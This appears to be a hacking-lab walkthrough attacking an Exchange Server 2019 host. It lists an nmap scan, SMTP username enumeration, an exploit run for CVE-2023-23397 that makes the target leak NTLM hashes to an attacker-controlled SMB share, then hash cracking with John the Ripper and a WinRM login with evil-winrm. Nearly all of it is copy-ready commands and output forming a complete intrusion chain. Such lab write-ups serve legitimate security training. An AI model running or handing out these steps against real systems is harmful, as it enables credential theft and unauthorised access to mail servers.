OWA Exchange Server 2019
Exchange Server 2019
Nmap
nmap -p- -A <IP> -oA myHost
Starting Nmap 7.93 ( https://nmap.org ) at XXX EDT
PORT STATE SERVICE VERSION
25/tcp open smtp Microsoft Exchange smtpd
| smtp-commands: ad.domain Hello [10.10.16.158], SIZE, PI
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
81/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: 403 - Forbidden: Access is denied.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: XXXX-XX)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain:DOMAIN
|
443/tcp open ssl/https
|
444/tcp open snpp?
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
465/tcp open smtp Microsoft Exchange smtpd
|
587/tcp open smtp Microsoft Exchange smtpd
|
|_ Product_Version: 10.0.17763
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
|
|
717/tcp open smtp Microsoft Exchange smtpd
|
808/tcp open ccproxy-http?
890/tcp open mc-nmf .NET Message Framing
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: DOMAIN., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DOMAIN
| Not valid before: X
|_Not valid after: X
| rdp-ntlm-info:
| Target_Name: DOMAIN
| NetBIOS_Domain_Name: DOMAIN
| NetBIOS_Computer_Name: DOMAIN
| DNS_Domain_Name: DOMAIN
| DNS_Computer_Name: DOMAIN
| DNS_Tree_Name: DOMAIN
| Product_Version: 10.0.17763
|_ System_Time: XXX
3875/tcp open msexchange-logcopier Microsoft Exchange 2010 log copier
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6067/tcp open msrpc Microsoft Windows RPC
...
64327/tcp open msexchange-logcopier Microsoft Exchange 2010 log copier
64337/tcp open mc-nmf .NET Message Framing
OWA - HTTPS 443
https://github.com/kh4sh3i/exchange-penetration-testing.git
git clone https://github.com/kh4sh3i/exchange-penetration-testing.git
cd exchange-penetration-testing
python3 get_exchange_version.py https://10.129.229.14
Build number:15.2.1118
Exchange Server 2019
SMTP
wget https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt?raw=true
smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./xato-net-10-million-usernames.txt
smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./users.txt
└─# smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./users.txt
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... ./users.txt
Target count ............. 1
Username count ........... 8295455
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ <DOMAIN>
######## Scan started at Thu XXX #########
10.129.229.14: valdaccount@DOMAIN existsCVE-2023-23397
git clone https://github.com/BronzeBee/cve-2023-23397.git
┌──(kali㉿kali)-[/HTB/OWA/cve-2023-23397]
└─$ python cve-2023-23397.py -s 10.129.229.110 -f fromemail@email -t toemail@email -p '\\10.10.16.158\test'
[*] CVE-2023-23397 exploit
[*] Author: @bronzebee
[*] Connecting to 10.129.229.110:25
[*] Sending message to discovered@validaccount.domain
[*] Message sent to all addresses successfully
[*] Total messages sent: 1/1The exploit requires first SMB server running (impacket)
impacket-smbserver -smb2support share .
John the Ripper - crack NTLM hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
WinRM - TCP 5985
evil-winrm -i 10.129.229.14 -u validaccount -p 'password'Last updated
